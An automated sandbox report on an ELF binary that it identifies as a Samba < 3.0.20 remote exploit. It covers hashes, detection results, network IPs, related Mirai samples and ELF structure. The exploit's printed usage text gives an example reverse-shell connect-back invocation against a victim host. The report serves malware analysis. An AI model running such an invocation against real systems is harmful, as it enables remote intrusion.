Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf

Overview

General Information

Sample name:SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf
Analysis ID:1448261
MD5:9c4a6db5821b4a390b09223e5047cce7
SHA1:0395f1b0a67701763fc5ed8fce748c341a71bcd3
SHA256:79f4ad8a9216ca08bef87e8d0d63d2fba931375ea9ac941c205ae577ec8ab5b3
Tags:elf
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Contains symbols related to standard C library sleeps (sometimes used to evade sandboxing)
Executes the "rm" command used to delete files or directories

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1448261
Start date and time:2024-05-28 06:38:52 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf
Detection:MAL
Classification:mal48.linELF@0/0@0/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • Max analysis timeout: 600s exceeded, the analysis took too long
Command:/tmp/SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf
PID:6250
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Samba < 3.0.20 Zuc
by Zuc (zuc@hack.it)

Usage: <victim-host> <connectback-ip> <connectback port> <version>

Sample: LSA www.victim.com 80.81.82.83 31337 1
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6251, Parent: 4331)
  • rm (PID: 6251, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XIacViEATy /tmp/tmp.ZJrYcTpmyu /tmp/tmp.Ack5AbPZ3M
  • dash New Fork (PID: 6252, Parent: 4331)
  • rm (PID: 6252, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XIacViEATy /tmp/tmp.ZJrYcTpmyu /tmp/tmp.Ack5AbPZ3M
  • cleanup
No yara matches
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elfVirustotal: Detection: 8%Perma Link
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: classification engineClassification label: mal48.linELF@0/0@0/0
Source: /usr/bin/dash (PID: 6251)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XIacViEATy /tmp/tmp.ZJrYcTpmyu /tmp/tmp.Ack5AbPZ3MJump to behavior
Source: /usr/bin/dash (PID: 6252)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.XIacViEATy /tmp/tmp.ZJrYcTpmyu /tmp/tmp.Ack5AbPZ3MJump to behavior
Source: ELF symbol in initial sampleSymbol name: usleep
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
Virtualization/Sandbox Evasion
OS Credential Dumping1
Virtualization/Sandbox Evasion
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
File Deletion
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf5%ReversingLabsLinux.Exploit.Remotehack
SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf9%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
54.171.230.55
unknownUnited States
16509AMAZON-02USfalse
109.202.202.202
unknownSwitzerland
13030INIT7CHfalse
91.189.91.43
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
91.189.91.42
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
54.171.230.55SlVpIUg14p.elfGet hashmaliciousOkiruBrowse
    s0OthAxkuM.elfGet hashmaliciousGafgyt, MiraiBrowse
      Aqua.x86.elfGet hashmaliciousUnknownBrowse
        A13Zu2Plc8.elfGet hashmaliciousMuhstik, TsunamiBrowse
          5BV1oDzv8L.elfGet hashmaliciousMuhstik, TsunamiBrowse
            zUCeX9wuiq.elfGet hashmaliciousGafgyt, Mirai, OkiruBrowse
              KFhNxvfU3w.elfGet hashmaliciousMirai, MoobotBrowse
                aBty1GtaQm.elfGet hashmaliciousUnknownBrowse
                  assailant.arm4.elfGet hashmaliciousMiraiBrowse
                    vgEeUy68no.elfGet hashmaliciousMiraiBrowse
                      109.202.202.20268GaMPsodL.elfGet hashmaliciousMiraiBrowse
                        UR9IPwN06O.elfGet hashmaliciousMiraiBrowse
                          tLK3zeaMw7.elfGet hashmaliciousMirai, OkiruBrowse
                            jFKZRvQh4R.elfGet hashmaliciousOkiruBrowse
                              tXgvvzMEUY.elfGet hashmaliciousOkiruBrowse
                                iKNw6OUwtY.elfGet hashmaliciousOkiruBrowse
                                  u4B2cmH10B.elfGet hashmaliciousUnknownBrowse
                                    j3HUE9md5e.elfGet hashmaliciousMiraiBrowse
                                      bXgYzqzEEv.elfGet hashmaliciousUnknownBrowse
                                        DerI9qwTwK.elfGet hashmaliciousKaijiBrowse
                                          91.189.91.4368GaMPsodL.elfGet hashmaliciousMiraiBrowse
                                            tLK3zeaMw7.elfGet hashmaliciousMirai, OkiruBrowse
                                              jFKZRvQh4R.elfGet hashmaliciousOkiruBrowse
                                                tXgvvzMEUY.elfGet hashmaliciousOkiruBrowse
                                                  iKNw6OUwtY.elfGet hashmaliciousOkiruBrowse
                                                    u4B2cmH10B.elfGet hashmaliciousUnknownBrowse
                                                      j3HUE9md5e.elfGet hashmaliciousMiraiBrowse
                                                        bXgYzqzEEv.elfGet hashmaliciousUnknownBrowse
                                                          DerI9qwTwK.elfGet hashmaliciousKaijiBrowse
                                                            dwGggzN8hM.elfGet hashmaliciousUnknownBrowse
                                                              91.189.91.4268GaMPsodL.elfGet hashmaliciousMiraiBrowse
                                                                UR9IPwN06O.elfGet hashmaliciousMiraiBrowse
                                                                  tLK3zeaMw7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    jFKZRvQh4R.elfGet hashmaliciousOkiruBrowse
                                                                      tXgvvzMEUY.elfGet hashmaliciousOkiruBrowse
                                                                        iKNw6OUwtY.elfGet hashmaliciousOkiruBrowse
                                                                          u4B2cmH10B.elfGet hashmaliciousUnknownBrowse
                                                                            j3HUE9md5e.elfGet hashmaliciousMiraiBrowse
                                                                              bXgYzqzEEv.elfGet hashmaliciousUnknownBrowse
                                                                                DerI9qwTwK.elfGet hashmaliciousKaijiBrowse
                                                                                  No context
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CANONICAL-ASGBr0tEgU8WOn.elfGet hashmaliciousMiraiBrowse
                                                                                  • 185.125.190.26
                                                                                  68GaMPsodL.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  UR9IPwN06O.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  hb6HIMj9J2.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  tLK3zeaMw7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  jFKZRvQh4R.elfGet hashmaliciousOkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  SlVpIUg14p.elfGet hashmaliciousOkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  tXgvvzMEUY.elfGet hashmaliciousOkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  iKNw6OUwtY.elfGet hashmaliciousOkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  l1U28fBk2K.elfGet hashmaliciousUnknownBrowse
                                                                                  • 185.125.190.26
                                                                                  CANONICAL-ASGBr0tEgU8WOn.elfGet hashmaliciousMiraiBrowse
                                                                                  • 185.125.190.26
                                                                                  68GaMPsodL.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  UR9IPwN06O.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  hb6HIMj9J2.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  tLK3zeaMw7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  jFKZRvQh4R.elfGet hashmaliciousOkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  SlVpIUg14p.elfGet hashmaliciousOkiruBrowse
                                                                                  • 185.125.190.26
                                                                                  tXgvvzMEUY.elfGet hashmaliciousOkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  iKNw6OUwtY.elfGet hashmaliciousOkiruBrowse
                                                                                  • 91.189.91.42
                                                                                  l1U28fBk2K.elfGet hashmaliciousUnknownBrowse
                                                                                  • 185.125.190.26
                                                                                  AMAZON-02USUR9IPwN06O.elfGet hashmaliciousMiraiBrowse
                                                                                  • 34.249.145.219
                                                                                  i0GHEh10ne.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 34.254.182.186
                                                                                  eId5V85KKM.elfGet hashmaliciousUnknownBrowse
                                                                                  • 54.101.89.128
                                                                                  0xh0roxxnavebusyoo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 18.163.57.17
                                                                                  https://sudanesesport.com/Get hashmaliciousUnknownBrowse
                                                                                  • 65.9.86.127
                                                                                  http://82.165.254.110/loginmso.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 176.34.167.98
                                                                                  https://tiny-crumble-2e94fb.netlify.app/instruct.html/Get hashmaliciousUnknownBrowse
                                                                                  • 18.192.94.96
                                                                                  https://aquamarine-tartufo-riqueza.netlify.app/dev.html/Get hashmaliciousUnknownBrowse
                                                                                  • 3.72.140.173
                                                                                  https://bespoke-croquembouche-6486c6.netlify.app/about.html/Get hashmaliciousUnknownBrowse
                                                                                  • 3.70.101.28
                                                                                  http://discord.jerry-tao.com/Get hashmaliciousUnknownBrowse
                                                                                  • 18.239.18.36
                                                                                  INIT7CH68GaMPsodL.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  UR9IPwN06O.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  tLK3zeaMw7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  jFKZRvQh4R.elfGet hashmaliciousOkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  tXgvvzMEUY.elfGet hashmaliciousOkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  iKNw6OUwtY.elfGet hashmaliciousOkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  u4B2cmH10B.elfGet hashmaliciousUnknownBrowse
                                                                                  • 109.202.202.202
                                                                                  j3HUE9md5e.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  bXgYzqzEEv.elfGet hashmaliciousUnknownBrowse
                                                                                  • 109.202.202.202
                                                                                  DerI9qwTwK.elfGet hashmaliciousKaijiBrowse
                                                                                  • 109.202.202.202
                                                                                  No context
                                                                                  No context
                                                                                  No created / dropped files found
                                                                                  File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9fb4d0a2c065e78f9689a929f04427dcb2bcc1ac, with debug_info, not stripped
                                                                                  Entropy (8bit):4.9056401313215865
                                                                                  TrID:
                                                                                  • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
                                                                                  • ELF Executable and Linkable format (generic) (4004/1) 49.46%
                                                                                  • Lumena CEL bitmap (63/63) 0.78%
                                                                                  File name:SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf
                                                                                  File size:31'124 bytes
                                                                                  MD5:9c4a6db5821b4a390b09223e5047cce7
                                                                                  SHA1:0395f1b0a67701763fc5ed8fce748c341a71bcd3
                                                                                  SHA256:79f4ad8a9216ca08bef87e8d0d63d2fba931375ea9ac941c205ae577ec8ab5b3
                                                                                  SHA512:efe46fcaa0bad618b55d29f2dcb208cd77f0dc6ebe4062338c03b4489e8c44441dfa72b52d1341bac4c1d610eabce368397cce2059a2570464c0c3af918614c2
                                                                                  SSDEEP:384:UVBycpjD3JC2+FGa8dAw4ZXZrUhCEejrr02cVAV73/v/ruJ9M2cN8S9h:UmchJCLd8dAnZrUhCtrrtHf8S9h
                                                                                  TLSH:04E2C4A77241E72AE0A3CB350E534AB5E371B1749723B317AF0946366D126C81F34B8B
                                                                                  File Content Preview:.ELF..............>.....0.@.....@........^..........@.8...@.&.#.........@.......@.@.....@.@.....................................8.......8.@.....8.@...............................................@.......@.....DB......DB........ ..............N.......N`....

                                                                                  ELF header

                                                                                  Class:ELF64
                                                                                  Data:2's complement, little endian
                                                                                  Version:1 (current)
                                                                                  Machine:Advanced Micro Devices X86-64
                                                                                  Version Number:0x1
                                                                                  Type:EXEC (Executable file)
                                                                                  OS/ABI:UNIX - System V
                                                                                  ABI Version:0
                                                                                  Entry Point Address:0x400a30
                                                                                  Flags:0x0
                                                                                  ELF Header Size:64
                                                                                  Program Header Offset:64
                                                                                  Program Header Size:56
                                                                                  Number of Program Headers:9
                                                                                  Section Header Offset:24232
                                                                                  Section Header Size:64
                                                                                  Number of Section Headers:38
                                                                                  Header String Table Index:35
                                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                  NULL0x00x00x00x00x0000
                                                                                  .interpPROGBITS0x4002380x2380x1c0x00x2A001
                                                                                  .note.ABI-tagNOTE0x4002540x2540x200x00x2A004
                                                                                  .note.gnu.build-idNOTE0x4002740x2740x240x00x2A004
                                                                                  .hashHASH0x4002980x2980xa40x40x2A608
                                                                                  .gnu.hashGNU_HASH0x4003400x3400x1c0x00x2A608
                                                                                  .dynsymDYNSYM0x4003600x3600x2100x180x2A718
                                                                                  .dynstrSTRTAB0x4005700x5700xc70x00x2A001
                                                                                  .gnu.versionVERSYM0x4006380x6380x2c0x20x2A602
                                                                                  .gnu.version_rVERNEED0x4006680x6680x300x00x2A718
                                                                                  .rela.dynRELA0x4006980x6980x180x180x2A608
                                                                                  .rela.pltRELA0x4006b00x6b00x1f80x180x2A6138
                                                                                  .initPROGBITS0x4008a80x8a80x1a0x00x6AX004
                                                                                  .pltPROGBITS0x4008d00x8d00x1600x100x6AX0016
                                                                                  .textPROGBITS0x400a300xa300x2a740x00x6AX0016
                                                                                  .finiPROGBITS0x4034a40x34a40x90x00x6AX004
                                                                                  .rodataPROGBITS0x4034b00x34b00x8bb0x00x2A008
                                                                                  .eh_frame_hdrPROGBITS0x403d6c0x3d6c0xec0x00x2A004
                                                                                  .eh_framePROGBITS0x403e580x3e580x3ec0x00x2A008
                                                                                  .init_arrayINIT_ARRAY0x604e000x4e000x80x00x3WA008
                                                                                  .fini_arrayFINI_ARRAY0x604e080x4e080x80x00x3WA008
                                                                                  .jcrPROGBITS0x604e100x4e100x80x00x3WA008
                                                                                  .dynamicDYNAMIC0x604e180x4e180x1e00x100x3WA708
                                                                                  .gotPROGBITS0x604ff80x4ff80x80x80x3WA008
                                                                                  .got.pltPROGBITS0x6050000x50000xc00x80x3WA008
                                                                                  .dataPROGBITS0x6050c00x50c00x100x00x3WA008
                                                                                  .bssNOBITS0x6050d00x50d00x180x00x3WA008
                                                                                  .commentPROGBITS0x00x50d00x420x10x30MS001
                                                                                  .debug_arangesPROGBITS0x00x51200x1000x00x00016
                                                                                  .debug_infoPROGBITS0x00x52200x31b0x00x0001
                                                                                  .debug_abbrevPROGBITS0x00x553b0x1830x00x0001
                                                                                  .debug_linePROGBITS0x00x56be0x1e70x00x0001
                                                                                  .debug_strPROGBITS0x00x58a50x2ad0x10x30MS001
                                                                                  .debug_locPROGBITS0x00x5b520x11b0x00x0001
                                                                                  .debug_rangesPROGBITS0x00x5c700xd00x00x00016
                                                                                  .shstrtabSTRTAB0x00x5d400x1610x00x0001
                                                                                  .symtabSYMTAB0x00x68280xb580x180x037588
                                                                                  .strtabSTRTAB0x00x73800x6140x00x0001
                                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                  PHDR0x400x4000400x4000400x1f80x1f81.72770x5R E0x8
                                                                                  INTERP0x2380x4002380x4002380x1c0x1c3.94080x4R 0x1/lib64/ld-linux-x86-64.so.2.interp
                                                                                  LOAD0x00x4000000x4000000x42440x42445.69720x5R E0x200000.interp .note.ABI-tag .note.gnu.build-id .hash .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
                                                                                  LOAD0x4e000x604e000x604e000x2d00x2e81.79590x6RW 0x200000.init_array .fini_array .jcr .dynamic .got .got.plt .data .bss
                                                                                  DYNAMIC0x4e180x604e180x604e180x1e00x1e01.51520x6RW 0x8.dynamic
                                                                                  NOTE0x2540x4002540x4002540x440x443.52180x4R 0x4.note.ABI-tag .note.gnu.build-id
                                                                                  GNU_EH_FRAME0x3d6c0x403d6c0x403d6c0xec0xec4.26460x4R 0x4.eh_frame_hdr
                                                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                                                  GNU_RELRO0x4e000x604e000x604e000x2000x2001.52360x4R 0x1.init_array .fini_array .jcr .dynamic .got
                                                                                  TypeMetaValueTag
                                                                                  DT_NEEDEDsharedliblibc.so.60x1
                                                                                  DT_INITvalue0x4008a80xc
                                                                                  DT_FINIvalue0x4034a40xd
                                                                                  DT_INIT_ARRAYvalue0x604e000x19
                                                                                  DT_INIT_ARRAYSZbytes80x1b
                                                                                  DT_FINI_ARRAYvalue0x604e080x1a
                                                                                  DT_FINI_ARRAYSZbytes80x1c
                                                                                  DT_HASHvalue0x4002980x4
                                                                                  DT_GNU_HASHvalue0x4003400x6ffffef5
                                                                                  DT_STRTABvalue0x4005700x5
                                                                                  DT_SYMTABvalue0x4003600x6
                                                                                  DT_STRSZbytes1990xa
                                                                                  DT_SYMENTbytes240xb
                                                                                  DT_DEBUGvalue0x00x15
                                                                                  DT_PLTGOTvalue0x6050000x3
                                                                                  DT_PLTRELSZbytes5040x2
                                                                                  DT_PLTRELpltrelDT_RELA0x14
                                                                                  DT_JMPRELvalue0x4006b00x17
                                                                                  DT_RELAvalue0x4006980x7
                                                                                  DT_RELASZbytes240x8
                                                                                  DT_RELAENTbytes240x9
                                                                                  DT_VERNEEDvalue0x4006680x6ffffffe
                                                                                  DT_VERNEEDNUMvalue10x6fffffff
                                                                                  DT_VERSYMvalue0x4006380x6ffffff0
                                                                                  DT_NULLvalue0x00x0
                                                                                  NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                                  .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                  __gmon_start__.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                  __libc_start_mainGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  atoiGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  closeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  connectGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  exitGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  freeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  gethostbynameGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  htonsGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  inet_addrGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  memcpyGLIBC_2.14libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  memsetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  putsGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  recvGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  sendGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  shutdownGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  socketGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  strcpyGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  strdupGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  strlenGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  usleepGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                  .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4002380SECTION<unknown>DEFAULT1
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4002540SECTION<unknown>DEFAULT2
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4002740SECTION<unknown>DEFAULT3
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4002980SECTION<unknown>DEFAULT4
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4003400SECTION<unknown>DEFAULT5
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4003600SECTION<unknown>DEFAULT6
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4005700SECTION<unknown>DEFAULT7
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4006380SECTION<unknown>DEFAULT8
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4006680SECTION<unknown>DEFAULT9
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4006980SECTION<unknown>DEFAULT10
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4006b00SECTION<unknown>DEFAULT11
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4008a80SECTION<unknown>DEFAULT12
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4008d00SECTION<unknown>DEFAULT13
                                                                                  .symtab0x400a300SECTION<unknown>DEFAULT14
                                                                                  GLIBC_2.14libc.so.6.symtab0x4034a40SECTION<unknown>DEFAULT15
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x4034b00SECTION<unknown>DEFAULT16
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x403d6c0SECTION<unknown>DEFAULT17
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x403e580SECTION<unknown>DEFAULT18
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x604e000SECTION<unknown>DEFAULT19
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x604e080SECTION<unknown>DEFAULT20
                                                                                  GLIBC_2.2.5libc.so.6.symtab0x604e100SECTION<unknown>DEFAULT21
                                                                                  .symtab0x604e180SECTION<unknown>DEFAULT22
                                                                                  .symtab0x604ff80SECTION<unknown>DEFAULT23
                                                                                  .symtab0x6050000SECTION<unknown>DEFAULT24
                                                                                  .symtab0x6050c00SECTION<unknown>DEFAULT25
                                                                                  .symtab0x6050d00SECTION<unknown>DEFAULT26
                                                                                  .symtab0x00SECTION<unknown>DEFAULT27
                                                                                  .symtab0x00SECTION<unknown>DEFAULT28
                                                                                  .symtab0x00SECTION<unknown>DEFAULT29
                                                                                  .symtab0x00SECTION<unknown>DEFAULT30
                                                                                  .symtab0x00SECTION<unknown>DEFAULT31
                                                                                  .symtab0x00SECTION<unknown>DEFAULT32
                                                                                  .symtab0x00SECTION<unknown>DEFAULT33
                                                                                  .symtab0x00SECTION<unknown>DEFAULT34
                                                                                  .symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                  .symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                                  BINDRequest2nd.symtab0x40163f1154FUNC<unknown>DEFAULT14
                                                                                  BINDRequestRESPONSE2nd.symtab0x401ac1101FUNC<unknown>DEFAULT14
                                                                                  LSA.symtab0x40267c3493FUNC<unknown>DEFAULT14
                                                                                  NTCreateAndXRequest2nd.symtab0x401398571FUNC<unknown>DEFAULT14
                                                                                  NTCreateAndXRequestRESPONSE2nd.symtab0x4015d3108FUNC<unknown>DEFAULT14
                                                                                  NegotiateProtocolRequest2nd.symtab0x400be4297FUNC<unknown>DEFAULT14
                                                                                  NegotiateProtocolRequestRESPONSE2nd.symtab0x400d0d94FUNC<unknown>DEFAULT14
                                                                                  SessionSetupAndXRequest2nd.symtab0x400d6b214FUNC<unknown>DEFAULT14
                                                                                  SessionSetupAndXRequest2ndb.symtab0x400ead266FUNC<unknown>DEFAULT14
                                                                                  SessionSetupAndXRequest2ndc.symtab0x401023348FUNC<unknown>DEFAULT14
                                                                                  SessionSetupAndXRequestRESPONSE2nd.symtab0x400e41108FUNC<unknown>DEFAULT14
                                                                                  SessionSetupAndXRequestRESPONSE2ndb.symtab0x400fb7108FUNC<unknown>DEFAULT14
                                                                                  SessionSetupAndXRequestRESPONSE2ndc.symtab0x40117f108FUNC<unknown>DEFAULT14
                                                                                  TreeConnectAndXRequest2nd.symtab0x4011eb293FUNC<unknown>DEFAULT14
                                                                                  TreeConnectAndXRequestRESPONSE2nd.symtab0x401310136FUNC<unknown>DEFAULT14
                                                                                  UniversalMethodFirst.symtab0x401b26647FUNC<unknown>DEFAULT14
                                                                                  UniversalMethodFirstRESPONSE.symtab0x401dad94FUNC<unknown>DEFAULT14
                                                                                  UniversalMethodLast.symtab0x4020f0707FUNC<unknown>DEFAULT14
                                                                                  UniversalMethodLastRESPONSE.symtab0x4023b394FUNC<unknown>DEFAULT14
                                                                                  UniversalMethodMiddle.symtab0x401e0b647FUNC<unknown>DEFAULT14
                                                                                  UniversalMethodMiddleRESPONSE.symtab0x40209294FUNC<unknown>DEFAULT14
                                                                                  _DYNAMIC.symtab0x604e180OBJECT<unknown>DEFAULT22
                                                                                  _GLOBAL_OFFSET_TABLE_.symtab0x6050000OBJECT<unknown>DEFAULT24
                                                                                  _IO_stdin_used.symtab0x4034b04OBJECT<unknown>DEFAULT16
                                                                                  _ITM_deregisterTMCloneTable.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                  _ITM_registerTMCloneTable.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                  _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                  __FRAME_END__.symtab0x4042400OBJECT<unknown>DEFAULT18
                                                                                  __JCR_END__.symtab0x604e100OBJECT<unknown>DEFAULT21
                                                                                  __JCR_LIST__.symtab0x604e100OBJECT<unknown>DEFAULT21
                                                                                  __TMC_END__.symtab0x6050d00OBJECT<unknown>HIDDEN25
                                                                                  __bss_start.symtab0x6050d00NOTYPE<unknown>DEFAULT26
                                                                                  __data_start.symtab0x6050c00NOTYPE<unknown>DEFAULT25
                                                                                  __do_global_dtors_aux.symtab0x400ad00FUNC<unknown>DEFAULT14
                                                                                  __do_global_dtors_aux_fini_array_entry.symtab0x604e080OBJECT<unknown>DEFAULT20
                                                                                  __dso_handle.symtab0x6050c80OBJECT<unknown>HIDDEN25
                                                                                  __frame_dummy_init_array_entry.symtab0x604e000OBJECT<unknown>DEFAULT19
